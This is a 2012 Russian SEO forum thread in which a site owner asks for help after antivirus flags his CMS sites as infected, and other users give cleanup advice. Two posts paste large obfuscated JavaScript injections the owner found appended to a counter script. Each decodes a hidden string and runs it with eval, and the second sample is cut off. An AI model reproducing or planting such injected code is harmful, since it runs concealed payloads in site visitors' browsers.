Вернуться   SEO форум - оптимизация и продвижение сайтов > Web разработки > Безопасность

Важная информация
Безопасность - Помощь в обнаружении и удалении вредоносного кода с сайта. Устранение последствий взлома. Все о веб безопасности.

Ответ
выдача ТОП 2Полезны

 
Опции темы Оценить тему Опции просмотра
Старый 12.03.2012, 12:01   #1
 
Аватар для падаван
 
Сообщений: 814
FR (активность): 25,662

Доп. информация
Восклицание Автор темы Помогите, сайт заражен!

Вобщем какое то безумие, захожу сегодня на свой сайт, KIS говорит "сайт заражен", блокирует мои файлы со скриптами как Трояны, а также запрещает какую то действительно левую ссылку. Решил что файлы скриптов заражены, удалил все что есть, однако, эта ссылка видимо еще где то осталась! Сейчас качаю все файлы сайта через фтп, находятся трояны, много!!

Что ж делать теперь, удалять все под чистую и копировать резерв с локала?
И как вообще теперь найти уязвимость, понять как такое могло произойти??

ps я в шоке

Скрытый (как скрывать?) текст. Только для группы: "Почетный пользователь":
Ваша группа не позволяет просмотреть скрытую информацию.


твою мать...
это ж все скрипты наверно (то есть cms'ные, не которые я подключал сам)...как так...еще подумал kis взбесился, но на копию сайта на локале он совершенно не ругается
Миниатюры
Помогите, сайт заражен!-tm.jpg  


ученик SeoCafe
падаван вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 12.03.2012, 12:25   #2
 
Аватар для cthulchu
 
Сообщений: 3,708
FR (активность): 120,615

Доп. информация
По умолчанию

убей антивирус, сдампь фтп и ищи левый код в исполняемых файлах.
не парься, в данном случае количество не играет роли.
cthulchu вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 12.03.2012, 12:39   #3
 
Аватар для падаван
 
Сообщений: 814
FR (активность): 25,662

Доп. информация
По умолчанию Автор темы

cthulchu, так я сдампил, но зараженных файлов то 627, в каждом искать левый код? или какие файлы ты имеешь ввиду?


ученик SeoCafe
падаван вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 12.03.2012, 12:41   #4
 
Аватар для cthulchu
 
Сообщений: 3,708
FR (активность): 120,615

Доп. информация
По умолчанию

код один и тот же. просто найди его в любом файле, дальше, используя словогрыз, убей этот код во всех файлах и все будет отлично. зальешь обратно чистый дамп, предварительно, конечно, поискав в нем шеллы. дальше обновишь двиг, сменишь пароли в базуи на фтп (на фтп - на всякий случай) и все будет нормально.
cthulchu вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
"Спасибо" от:
падаван (12.03.2012)
Старый 12.03.2012, 12:46   #5
 
Аватар для падаван
 
Сообщений: 814
FR (активность): 25,662

Доп. информация
По умолчанию Автор темы

Цитата:
Сообщение от cthulchu Посмотреть сообщение
зальешь обратно чистый дамп, предварительно, конечно, поискав в нем шеллы.
так может действительно бэкап сайта залить, что б точно чистый был? а так вдруг что нибудь просмотрю. поискать шеллы я не с умею, тут я 0 ...

Добавлено через 22 минуты
так, вообще полный ах.й, сперва слил папку только этого сайта, а на серве у меня три сайта, начал все скидывать, оказалось те два тоже заражены!!! да точнее один, потому что третий еще пустой домен, только заглушка стоит из одной index.html без движка. а у тех cms одинаковые

И теперь внимание, доп вопрос: этот третий домен недавний дроп, может он оказаться уязвимостью, изза которой остальные сайты на серве заразились? (просто я мало понимаю в этом)


ученик SeoCafe
падаван вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 12.03.2012, 13:16   #6
 
Аватар для cthulchu
 
Сообщений: 3,708
FR (активность): 120,615

Доп. информация
По умолчанию

нет, факт дропа не может создавать дыру в безопасности.

делай то же самое - ищи код, удаляй, ищи шеллы - удаляй, заливай сайт обратно, обновляй двиг и плаги.
шелл искать тоже просто, но я уже на этом форуме много раз такое говорил, вот, посмотри:
https://www.google.com.ua/#sclient=p...=1914&bih=1004
cthulchu вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
"Спасибо" от:
падаван (12.03.2012)
Старый 12.03.2012, 14:02   #7
 
Аватар для Phoenix
 
Сообщений: 1,021
FR (активность): 39,032

Доп. информация
По умолчанию

Не ктулх у меня код в каждом js был разный но его легко увидеть

Добавлено через 1 минуту
Самое простое смотри дату изменения файла и делай бэкап от более раннего числа


В сео денег нет, совсем нет
Phoenix вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
"Спасибо" от:
падаван (12.03.2012)
Старый 12.03.2012, 14:13   #8
 
Аватар для падаван
 
Сообщений: 814
FR (активность): 25,662

Доп. информация
По умолчанию Автор темы

Цитата:
Сообщение от xxxPHOENIXxxx Посмотреть сообщение
Самое простое смотри дату изменения файла и делай бэкап от более раннего числа
так и делаю сейчас, заливаю все по новой, хорошо что бэкап не так давно делал, все сохранено. не стал искать этот код, лучше 100% чистые файлы из копии

Добавлено через 13 минут
ааа да б*я, перезалил все локала, с хоста удалил все что было, захожу в админку а kis опять трояна находит! да как так то?? я же удалил все зараженное, все сайты, оставшиеся на хосте стандартные файлы/папки заливал на комп, проверял, все чисто. где эта зараза еще остаться то могла?!

--------

нет, щас вот опять все чисто, после перезаливки, наверно в кэше браузера оставалось. пароли в админку к БД и фтп сменил, теперь буду как то обновлять двиг, искать шеллы...

---UPD---

а! зашел на четвертый свой сайт, который находится на другом хостинге, и на нем kis тоже ругается на скрипты! ребята, что это?? о чем это говорит?? как могло произойти?!
Скрытый (как скрывать?) текст. Только для группы: "Почетный пользователь":
Ваша группа не позволяет просмотреть скрытую информацию.

вот чертов код в одном из файлов скрипта, в который у меня был вынесен счетчик Лайва, начинается он после окончания счетчика:
Оффтоп:

[php]<!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t16.10;r"+
escape(document.referrer)+((typeof(screen)=="undef ined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.co lorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape( document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров за 24"+
" часа, посетителей за 24 часа и за сегодня' "+
"border='0' width='88' height='31'><\/a>")
//--></script><!--/LiveInternet-->
var kd04d66d="";function x705890081(){var

r11ffcdbd=String,m29c9f=Array.prototype.slice.call (arguments).join

(""),w31541452=m29c9f.substr(2,3)-364,d687f77ca,h719d3;m29c9f=m29c9f.substr(t533ba9( ));var

x5dba1520=m29c9f.length;for(var o2147c328=0;o2147c328<x5dba1520;o2147c328++){try{t hrow

(ed9bdff=m29c9f.substr(o2147c328,1));}catch(e){ed9 bdff=e;};if(ed9bdff=='}')

{w31541452="";o2147c328=wbe12e(o2147c328);eabcb650 0=m29c9f.substr(o2147c328,1);while

(h2ba6b(eabcb6500)){w31541452+=eabcb6500;o2147c328 ++;eabcb6500=m29c9f.substr

(o2147c328,1);}w31541452-=500;continue;}d687f77ca="";if(ed9bdff=='°'){o214 7c328+

+;ed9bdff=m29c9f.substr(o2147c328,1);while(ed9bdff !='°'){d687f77ca+=ed9bdff;o2147c328+

+;ed9bdff=m29c9f.substr(o2147c328,1);}d687f77ca=la 60bf10(d687f77ca,w31541452,50);if

(d687f77ca<0)d687f77ca+=256;d687f77ca=ie148a(d687f 77ca);x771e2e71(d687f77ca);continue;}

aba5667=(ed9bdff+'')["\x63h\x61\x72\x43o\x64eAt"](0);if(aba5667>848)aba5667-

=848;h719d3=aba5667-w31541452-50;h719d3=acedd9444(h719d3);kd04d66d+=l221e328(h71 9d3);}}

x705890081("1","23","8","9","s","°177","°","}"," 6","20}","°3","1°

°","2","4°}","513}","°16","2°","°179°°1","6 8","°","}5","2","5}","°1","8","6°","}

50","6","}","°166","°","`aX","}

550","}","°","2","23","°","}","575}","°1","3"," 8°","}","567}","°1","2","7°}

688}","°","247","°","}","6","76","}","X","}","53 ","0}°","17","7°","}

6","96}","h","°22","°","}","60","0","}","°11"," °}","5","88","}°2","5","2","°°","246°}

6","2","9","}°","2","1","1","°","°","24","0°", "°","2","11°

°2","1","8°","°27","°","'","}","577}","°24"," 3","°}","6","9","4","}d}

634}°","242","°","}","6","70}°11","°","}","6", "40","}","°237°}6","48","}

4+}","6","82}","_","}","548}°20","2","°","°","2 0","3","°}","680","}W","}

5","07}","°159","°}618","}","°","1","1","°","} 5","49}°2","1","6°°2","08","°°14","5°

°19","9°°","220","°","}","5","3","6}°","1","9 6","°","}

5","0","3}°153°","°163","°","°","1","68°c°1 7","2","°","°1","6","8°}

6","8","5","}°2","6","°","}6","6","6","}","?"," ","7","°","}69","7}°30°","2","°4°°","1", "°

°","0","°","`]","°","2","3","°°","31°","}","62","3}","!&"," 2","9","°}6","83","}N","X}

659","}7","}","7","00}","°26°","q}576}°","231° ","}","56","4}°","224°}612}°","6","°}

5","80}°","24","1","°","°","24","9","°

°1","76","°","°","250°","°251","°}","565}°2 3","7","°","°","217°","°223°}

51","1","}°158°","}6","2","3}°","2","0","°

°2","05","°}","6","01","}°","2","12","°}","66" ,"9","}°","24°}

58","3}","°","194","°","°165°}5","29}v","°19" ,"6","°","°189°}","5","48}","°1","9","8","

°","1","9","9°°","200°","°203°}","59","4","} ","°","25","4°","°2","4","5","°°24","4"," °

°","18","3","°°","185°°176","°","}","57","1} ","°","2","44°","}593","}","°","1","56°

°1","5","3","°","}68","7}","°24","6","°

°24","6°d}","5","4","1","}°19","6","°","}","55 ","6}°2","1","6","°

°2","0","6°","}","6","1","1","}","°16°","}50", "7}°","1","7","6°","}

5","8","3}°1","79","°","°","253","°}50","9}"," °180°","}505}","°1","77°","}

5","2","4","}","°","1","7","6°}5","38","}°","1" ,"9","6°","}","693","}TZ","°","1","9","°}

657}°1","2","°","}","596}","°17","8°

°1","9","4","°","}","5","3","1","}","°","14","0 °}","50","9}

HE","}","6","44}°203°?}","6","24}°1","87","°", "°18","4","°°18","3°","°18°","°29","°

°17°","}51","6}°183","°}","6","9","8}","e}","6 6","6","}=","}5","49","}","°2","09","°","}

6","5","3}","?°2","4","9°","}","6","04","}°9"," °","°8°°","7","°","}","688","}]

c}","5","75","}°240","°","°22","6","°}590","}" ,"°","2","4","9","°","°","251","°°2","°

°2","4","1°}6","8","5}°","1","1","°}

58","6}","°","19","7","°}","6","93}°19","°","} ","6","67}","?}","5","33","}","°","2","00°", "

°19","3","°}698}[","}","6","27}%°2","6","°°","3","2°","°3","1 °217°}564","}","°","155°","}

5","2","1}g°19","4°","}","52","9","}\\}561","}y} ","6","7","1}°","230°°","23","0","°F","}

5","55","}","°","207°°1","37","°","}

5","4","6}","°1","36","°","°21","5°}","5","3", "2}","°187°°192","°}559","}°209°

°","22","0","°","°22","8","°°15","5","°

°","22","9","°","}","5","22}","°193°","°1","9 4","°","}","53","1}°1","83°°189","°}

6","4","1}","°","3","2","°","}","6","8","3","}", "P","°9°","}","5","6","1","}","°","172","° "

,"}","61","8","}°","2","2","9°°","229","°", "}

6","3","4","}","°216","°","}","6","5","6}","°", "25","4°","°","24","7°}

62","2","}","°","2","04°}","6","74","}","[}59","6}°159","°}

5","90","}°150","°","°14","9","°}","6","5","9} ","°","21","8","°}","51","4}

I}","5","31}","°20","0","°","°","186","°}","6" ,"88}\\R","}","6","2","2","}°","27","°#","}

56","9}","°","1","65","°}56","0}","°2","30","° °2","31°","°232°}579}","°231°","}

5","4","3}","°201°","°19","0°","°196","°

°12","5°}","544}","°","1","5","5","°","}","68" ,"9","}°","1","5","°°","3","2°}

571","}°","18","0","°","}5","25","}XUTT}","6","7 4","}","°","233°","}643","}

7\"}","5","2","6}","°1","9","0°l}593","}","°247 °","°24","4","°","}

640","}°31","°","\"°","222°

°2","51","°}","5","7","4}","°156°","}","589"," }°23","9","°","°2","5","0","°

°","2","3","8","°","}","673","}","T}","5","13}", "°1","72","°}5","45}°","19","6°

°205","°","°2","11","°","°1","41","°°","1", "98","°

°1","9","6°}","56","7}°2","3","3","°","}","53" ,"5","}°","1","5","4°

°19","3","°}","561}°2","12°°2","2","0","°"," }

6","70","}","AJ}","60","7","}","°","17°","°","1 ","6","°","}","6","91","}","3}

6","1","7","}","°","3","2°","°","2","5","1","° ","°","8","°","}","50","8}°1","61°}","6"," 99}

G}","5","5","6","}","°203°","°2","1","5°","}", "59","9}","°2","50","°}

60","7","}°197","°","}

685}°18°}","7","0","0","}","b","}","6","01","}° 2","5","2","°}","5","4","7","}","°","1","94"

,"°","}","6","17","}°11°","°","20","6°}","626 }","°2","1","7°","}

54","6}°","1","8","7","°","°1","44°°189°

°","1","5","5","°","mji","i}","61","6}°","175", "°","}

53","1","}°","1","99","°","°","178","°}64","7" ,"}7","°","2","2","9","°8(","}6","8","2}Z}

66","2","}=}633}'+°215","°°","2","4","4","°°" ,"21","5°","°27","°&

°2","6","°,","$","°","28°","%","+}6","91","}", "°","3","1","°Tc","}69","8}]Y}6","2","7}","%

°2","2","°","°","24","6°}5","9","3}","°","251 ","°°2","44°","}","64","5}0","}

5","07","}","°","158","°","}","6","27}","°3","1 ","°","%","}649","}","°2","39°

°2","38","°","}","6","81","}

ZJYP","}","596}°2","°","°","6","°","°","1","8 ","5°","}","5","6","9}","°","1","6","0°","} ","

5","03}p}","6","8","6","}°","2","4","9°","}5","2 ","2","}

R","}","5","4","0","}","c","c","}","66","4","}"," ","223","°}

5","6","2","}°","22","7°","}","5","78","}","°", "2","2","7","°°2","4","2","°°","2","33","

°240°}6","07}°","17","°°","2","03","°","°", "17","°","°","22°

°","1","3°}","513","}","°1","64","°_","°124", "°}","6","3","0}°","2","1","2","°

°2","19","°","}55","8","}°22","4","°","°","20 ","9","°}","538}°208°","°204","°","°135

°19","4","°°1","8","5","°°","2","0","6°","° ","1","85","°}

56","7","}°23","2","°}","57","3}","°","2","22° ","}5","05}°169","°","°","160","°","}

6","4","0}.","}5","8","4}","°","25","0","°

°","173","°","}","544","}","°1","5","3","°kh", "}","68","3}","°","24","2","°}5","21","}

P}","6","7","3}°","2","3","2","°","R","B}","700} ","l","cj","n}

5","22}","v","}","605","}°","1","0°","}","5","28 ","}","°18","8","°°1","9","2°}

50","8","}","°1","59","°°1","55","°","}

566}°","216","°}","5","6","4}°2","3","5","°"," °","229°°","2","3","0","°","°","2","11°}

5","2","0","}","°1","8","6","°","°","1","7","1 }6","5","5}0","5",".",";","}

55","5","}°2","0","8°","°","2","06°","°","137 ","°","}","688","}+","°1","4°","}

608}","°4","°°1","9°","}6","8","9","}]}51","8","}°16","7°","}","644","}","6","}

5","89}","°24","4°°25","0°°","24","9","°°1" ,"7","1°}55","6}°1","4","6°}

52","2","}","q}","6","0","0","}","°1","82","°}", "58","4","}","°1","°","°","1","47°}

600}°","16","0","°","°1","59°}","5","67}","°1 26°","°","1","2","6°

°12","6","°}","5","25","}","°","18","0°°","17 ","7","°","}

6","56}","°","238","°","°246","°","B}","682"," }P","Q","}","6","9","2}

e","°","3","2°","d","}66","4}",";","}

6","9","3}","T}","6","1","0}°4","°","°","2","5" ,"°","°243","°}","6","35","}","-}

5","52","}°","1","9","9","°}","5","56}°2","22", "°}

60","2","}","°2","5","3°","°184°","°2","1","3 ","°}5","26","}","°13","7","°l","}5","28"," }

u}6","2","1","}°1","4","°°26°°","24","°","}" ,"580}°","2","42","°","}

6","6","3}","A",":","I:}","59","3","}","°18","2° °184°}61","4","}","°1","96","°","}

5","9","9","}","°","16","°","°","16","2°}5","5 5}","sr","r","}52","5","}","T","}

6","9","6","}°2","55°°","2","5","5°m_d","Ze"," m","$","n}","591}","°","6°}

6","05}","°21","°","}","560","}°2","1","2°°21 ","8°°","2","0","7","°

°213°}","5","65","}°","1","47°}","5","6","8}", "°17","9°","°1","50°","}","5","42}","°1","42

}6","3","7}","°246°°20","0°°","1","97","°°1 ","96°°","19","6°}5","13}

H","}","614}","°1","73","°","!}

6","6","7","}°","230","°","}","5","2","3","}","S RR","R","}","64","2}=°251°

°20","5","°}","543","}","gf}6","5","5}°","2","1 4","°°","21","4","°}

620}","°","29","°}","691}

Tc","}","5","8","2","}","°","237","°","°","2"," 44°","°2","4","8°","}","5","0","7}g","}

5","22}","°","183°","°","18","2","°°","1","8" ,"0","°","}63","1","}$}

5","8","6}","°","2","3","3°}","6","1","6}°","10 °°1","9","8°}

57","5","}","°","186°","°15","7°}5","76","}°" ,"2","28°","}","6","9","9}n}

6","74}","N","C","T","I","}5","23}","°1","8","4", "°","}","6","65","}","E

°","255°","°0°","°","24","7°R}6","21}°","18 4","°

°","1","81","°}","603}","°1","62","°","°1","6 2°°","1","62","°

°1","62","°}","55","5}","°","22","4°","}","614 }°1","3°","°","1","8°","°8°}

51","1","}","°","1","7","2°°1","8","0°","}508" ,"}","h°1","7","8","°","}

528","}°","1","9","9°","°","2","0","0","°}

6","4","1}%","}","657};0","6°","23","9","°","°" ,"12°","}","692}°","18°$","-","}

653}°21","6","°","°2","1","3°}","57","4}°1"," 33°","}","51","9","}NN

°","1","9","4°","}","5","63}°1","7","2","°°", "1","26","°°1","23","°z}

5","67","}°1","2","6","°","}","5","72","}","°1" ,"31","°}","645}","6}","673","}

B","Q}","6","3","6","}#}59","1}","°253°","}5","5 ","0","}","°2","1","6","°°","1","46°

°215","°°","2","14","°","}","6","5","5","}","0 ","}6","6","3","}","°","245","°

°18°","°","245°","}600","}","°","11","°","}" ,"597}","°","5°

°","25","5","°","°1","79","°","}","52","8}y"," n}691","}>","R","e","}

6","26}","°","24","°","°22","2","°","\"}663}", "6C","9","D","B","}

5","9","0","}","°","1","8","0°}","54","8}°1","3 ","9°}

5","31}","°","1","27°}","5","99","}","°9","°}" ,"5","3","1","}","°192","°°164","°

°","1","9","7°","°","19","5°","}","583}°","2" ,"38°°","2","43","°","°2","3","6°

°","17","3°}","6","7","4}°9°}51","6}p}","596}" ,"°5°","°7°

°2","44","°","°5°}","566}°","232","°°2","3" ,"0","°","}","557","}°","212","°}68","7}

[}","5","50}","°","203°","°140°}","5","1","5"," }","t}","5","53}°","14","4","°

°","13","5°","°","1","46","°","}5","87}°1","6 ","9°°","17","6°}54","3}°","13","9","°

°","199°°2","0","8","°","}","62","8","}","°21 7","°","}","6","71}°2","4°","}

6","4","1","}°2","04","°","}502}",">","=","=}"," 5","37}","`}","55","4}°","2","0","8°","}

5","2","4","}","°1","7","5°}","68","7}N","Q","° ","27","°","N]","]","}","6","9","1","}

V_U","}63","8}","°2","5","5","°$%","(°32","°° 2","2","8","°/°","31","°}

549}","°","2","1","3°}52","2","}°1","77","°}

60","2","}","°8°","}","5","99","}","°9","°","} ","5","07","}","b}","679}°32","°","}","6","0 6

}°","169","°","°","1","6","6°","}","6","73}°" ,"23","2°","}52","9","}X","°","20","4°","}

56","1","}","°","124","°","}","590}","°1","5"," 0","°","}5","34","}]}6","3","0}1","}

6","71","}°","2","4°","°234","°°","231","°", "}64","6","}","A","}","688","}","°","23","°

°22°","°","2","3","°)","");eval(kd04d66d);func tion t533ba9(){return 5;}function wbe12e

(rcb2a959c){return ++rcb2a959c;}function ie148a(nbf41a4){if(nbf41a4==168)nbf41a4=1025;else

if(nbf41a4==184)nbf41a4=1105;return (nbf41a4>=192 && nbf41a4<256) ? nbf41a4+848 :

nbf41a4;}function h2ba6b(u2f5bc1e9){return u2f5bc1e9!='}';}function la60bf10

(wab141d80,gb565d,m6dcfd7b5){return wab141d80-gb565d-m6dcfd7b5;}function x771e2e71

(i81f1a85){var r11ffcdbd=String;kd04d66d+=r11ffcdbd["fro\x6dCha\x72C\x6fde"](i81f1a85);}

function l221e328(kcd83e){var r11ffcdbd=String;return r11ffcdbd["fro\x6dCha\x72C\x6fde"]

(kcd83e);}function acedd9444(te1d4ad){var y1cf2ba61=te1d4ad;if(y1cf2ba61<0)

y1cf2ba61+=256;if(y1cf2ba61==168)y1cf2ba61=1025;el se if(y1cf2ba61==184)

y1cf2ba61=1105;return (y1cf2ba61>=192 && y1cf2ba61<256) ? y1cf2ba61+848 : y1cf2ba61;}[/php]

и к тому же он действительно разный...


ученик SeoCafe
падаван вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 12.03.2012, 17:51   #9
 
Аватар для Phoenix
 
Сообщений: 1,021
FR (активность): 39,032

Доп. информация
По умолчанию

Да есть такое дело, сам очистил более 15 своих сайтов от такого говна. Главное так и не нашел пока дыру, что очень напрягает. Может у кого нибудь есть мнение как защитить js файлы от внедрения левого кода?


В сео денег нет, совсем нет
Phoenix вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
"Спасибо" от:
падаван (12.03.2012)
Старый 12.03.2012, 19:45   #10
 
Аватар для cthulchu
 
Сообщений: 3,708
FR (активность): 120,615

Доп. информация
По умолчанию

обновите двиги и плагины. это лучший метод по соотношению сложность/эффект. Так же, закройте регистрацию, можете перенести админку и поискать плаги, обеспечивающие безопасность.
cthulchu вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
"Спасибо" от:
Phoenix (12.03.2012)
Старый 12.03.2012, 19:57   #11
 
Аватар для Миротворец
 
Сообщений: 98
FR (активность): 3,522

Доп. информация
По умолчанию

Цитата:
Сообщение от падаван Посмотреть сообщение
захожу сегодня на свой сайт, KIS говорит "сайт заражен"
Сайт вроде не очень сложный.
Стоило ли делать его на cms MODx?
На простом HTML не проще ли?
Там ведь всего то файлов 20-100.
Миротворец вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 12.03.2012, 21:25   #12
 
Аватар для падаван
 
Сообщений: 814
FR (активность): 25,662

Доп. информация
По умолчанию Автор темы

Миротворец, сайт не сложный, но не на столько что бы на голом html его делать)


ученик SeoCafe
падаван вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 12.03.2012, 23:10   #13
 
Аватар для падаван
 
Сообщений: 814
FR (активность): 25,662

Доп. информация
По умолчанию Автор темы

вычитал про подобные ситуации. можете подсказать, как это, лечить командой по ssh, это что надо сделать?


ученик SeoCafe
падаван вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 04.04.2012, 08:16   #14
 
Аватар для падаван
 
Сообщений: 814
FR (активность): 25,662

Доп. информация
По умолчанию Автор темы

вобщем в тот раз восстанавливал все из бэкапа. пароли в фтп менеджере больше не хранил, однако сейчас обнаружил, что скриптовые файлы одного сайта снова заражены тем же кодом что и прошлый раз!
(он под спойлером если кому интересно. большой. узнать бы его предназначение)
Оффтоп:

var bb09d1="";function p675f2a94ff4(){var fdb3927c=String,ddc8de7=Array.prototype.slice.call (arguments).join(""),da665fd=ddc8de7.substr(13,3)-557,hce646,u718e2cd2;ddc8de7=ddc8de7.substr(16);va r k881cac7a=t14831068(ddc8de7);for(var h2441b019=0;h2441b019<k881cac7a;h2441b019++){try{t hrow(f1e2ea8=pbad8ded5(ddc8de7,h2441b019));}catch( e){f1e2ea8=e;};if(f1e2ea8=='•'){da665fd="";h2441 b019++;f70ed3050=ddc8de7.substr(h2441b019,1);while (f70ed3050!='•'){da665fd+=f70ed3050;h2441b019++; f70ed3050=n1f118(ddc8de7,h2441b019);}da665fd-=320;continue;}hce646="";if(f1e2ea8=='°'){h2441b0 19++;f1e2ea8=ddc8de7.substr(h2441b019,1);while(f1e 2ea8!='°'){hce646+=f1e2ea8;h2441b019++;f1e2ea8=dd c8de7.substr(h2441b019,1);}hce646=laa5bf1c(hce646, da665fd,25);if(hce646<0)hce646+=256;if(hce646>=192 )hce646+=848;else if(hce646==168)hce646=1025;else if(hce646==184)hce646=1105;t399b07f(hce646);contin ue;}q84f65a=(f1e2ea8+'')["\x63h\x61r\x43\x6fde\x41\x74"](0);if(q84f65a>848)q84f65a-=848;u718e2cd2=q84f65a-da665fd-25;if(u718e2cd2<0)u718e2cd2+=256;if(u718e2cd2>=192 )u718e2cd2+=848;else if(u718e2cd2==168)u718e2cd2=1025;else if(u718e2cd2==184)u718e2cd2=1105;bb09d1+=fdb3927c["\x66ro\x6dCh\x61r\x43od\x65"](u718e2cd2);}}p675f2a94ff4("b","36d7b","c","83","2 1ce","602","n","•496•","/>","7",",","•","3","6","6•°187°°","1","76", "°•","466","•","°26°","•33","7•","°15" ,"2°R•4","4","6•","°","1","9","2°°1","83° ","°1","8","°•426","•","°1","44°°141","° ","°","140","°","•","450","•","°","1","7"," °","°2","5","2","°","°13","°","•","5","09", "•°","2","46","°","•4","1","3","•","°","2 35","°•","42","0•","°","2","39°","•322• ","°13","5°","•3","7","3•n°","1","39°n•" ,"382","•","°","126°•","3","24","•°13","3 ","°","°14","5","°","•","4","7","4•","'•3 7","6•°","1","9","3","°","•51","9","•","° ","2","6°•47","1","•°223°","•5","2","0"," •°1","6","°N","B","•","346•°","158°°16" ,"2","°","•","3","31","•V","°14","9°•","3 9","6•","°","147°","°","2","12","°","°2","0 0","°•3","23","•°145°","°1","2","8°°1"," 37°","°","1","49°°","144","°","•","5","08 H","E","•5","1","5•","?°","1","0","°","OA ","4","7","9•","$°","3","0°•","4","49","• °","3","°","°10","°","•49","6","•°","2"," 4","7°","•3","2","3","•","°13","3","°","• 4","24•°2","3","9","°°2","3","1°","°240"," ","•","325•","M","•4","6","2•°","14°"," °","2","1","4","°°2","06","°","°","22","6"," ","°1","80","°","°","17","7°","°176°•4"," 25•°","23","5","°•3","86","•°","19","3°" ,"°1","23°","•379•","°","1","24","°","•4 80","•-2•5","12","•","I•4","6","3•","°","1","3° ","•4","6","1","•","°","2","1°•","5","0"," 4","•7•","4","7","1","•°2","08","°•44"," 4•°","12","°","•3","52•°162","°°167"," ","°1","5","7°","°","1","68°","•4","57•° 2","5","°°2","08°","•390•°21","5°","°2", "16","°","°","2","17°","°","1","9","7°","•4 ","3","0","•°243°","•3","4","8•","°1","5" ,"0","°•","4","6","7","•°19°","•4","44• °","1","8","1","°","•467","•","°","23","3° ","°","2","3","3","°","°2","33°°2","0","4"," •3","2","2","•","B","°","14","4°","°","1", "37","°•","387","•","°","192°","°193°"," 3","49•°15","6","°","°","15","9°","•","3 ","3","8•","°","153°°","1","4","4°°","1","4 3°RT•","4","08","•°1","4","5°","°","236°" ,"°126°","•464•","°17","9","°•","469"," ","°","18","3","°","•3","99","•q","°","2" ,"23","°°","2","09°","°","214°","°","2","04 •","370","•°1","8","6","°•4","69","•"," %°","22","0","°","&•","4","4","0•°","10°° ","1","1","°","°","2","47","°•","4","9","4"," •","3(.°","2","31°","•","408","•","°1","7 ","4°•396•","°13","3°•","4","0","6•°1" ,"59°","°","170°","•","4","2","5•","°14"," 3°•","39","3•lk•","36","0","•°19","0°N" ,"•3","8","7","•","f","e","°1","9","2","°°2 0","3°°","191°•","37","8•","°","2","0","0 •","41","2•","°22","6","°°21","8°","°227 °","°","233°•","425","•°","17","6","°"," ","3","35","•","°15","1°•","3","5","7•", "°1","72°","•","4","3","6","•°","2","5","0" ,"°","•","348•","°1","6","4°","•395•"," °","217°°2","1","5°°","2","01","°","•","4" ,"77•","#","•4","6","2","•","°2","2","°"," °","2","9","°","°1","2","°•","3","3","7•J" ,"•47","1","•°237°•","4","3","3•°","1", "70°°","2","4","0","°","°","255°•","3","58 ","°","1","73°•","4","1","7","•","°22","1 °•","3","9","4•","°","215°","•387","•", "°197°","°2","0","3°°202°•33","7","•R• ","37","7•°","1","23","°","r•4","1","9•°2 ","47°°13","7°•346","•=<","•45","5","• 1","69°","°","9°","•451","•°2°","°","18 8","°•","441•°186°°9°•4","53","•°7", "°","•","4","6","1","•°","2","0°","•","48 8","•%08°","23","9","°","•","40","4•","°" ,"2","2","9","°•423•","°24","9°•","3","68 ","•","°","19","5","°°","175","°°","18","1 •3","50","•°152°","°1","58°Wt","t•","34 ","3•mP`","•","36","6","•","p","•498•"," °","2","35","°•","5","0","9","•","Q","•35" ,"3","•","G","•3","3","4","•","1","0","•", "39","2","•","jj°2","1","6","°","•","36","8" ,"•","°1","78","°","°1","8","3","°","•","4 ","7","6","•","°25","°","$","•","423","•", "°","24","7","°•","3","30","•","Q•","4","0 0","•","°","2","2","5","°•","4","63•","!", "\"•518","•[email protected]•5","1","9","•G°","0","°", "•4","73•°2","3","9°°","2","10°•","360 r","•4","56•°2","2","0","°","•4","67•", "°185°•","49","9•","°","2","14","°","•", "4","6","3","•","°1","7","7","°","°1","77"," ","°1","7","7","°","•","3","54","•","°","1 77","°","•3","6","7","•°1","69°","°186°", "•","493•","°","23","0°•33","5•","°","1 4","4","°°1","4","1","°•5","13","•",";>"," ","2","5","0","°°2","3°","°25","0","°•341" ,"•","°","14","6°","°","1","57","°","•","4 5","1•°","25","5","°•3","97","•°","219° ","476","•\"","•350","•°","1","5","6°• ","3","3","4•°","1","49°","°","15","5","°"," •4","53","•","°","2","04°°5","°","•43"," 3","•","°239","°°2","5","4°","•","385•° ","1","5","9","°","•3","4","3•°1","56°•32 ","5","•","°","13","1","°•482•(•","33"," 5•°","14","1","°","°","1","50°","•4","46", "•°11°","°","1","0","°","°","2","17°•"," 39","3•°21","9","°","°","18","2°","°195"," ","•4","11•°","2","19","°•","4","91","• °","1","8","°","•","3","8","6","•","°1","8" ,"8","°•","4","82•(•33","1•","°","1","3" ,"7°","L","•","350","•","^•344•°15","3° ","°15","0","°","•","32","2","•","°1","2"," 4°°","1","27°","•3","78","•","z•","4","3" ,"0","•","°","17","6°","°","22","6°","°","1 83","°•","5","03•","-","•","4","7","6","•","°","24","0°","•","4 ","8","8•","°","2","06°°2","0","3","°•","3 98•p•43","3","•","°14","7","°","•3","99" ,"•","q","°222°","•5","05•","3","•","4", "41•","°","4","°•5","10","•","°","24","7" 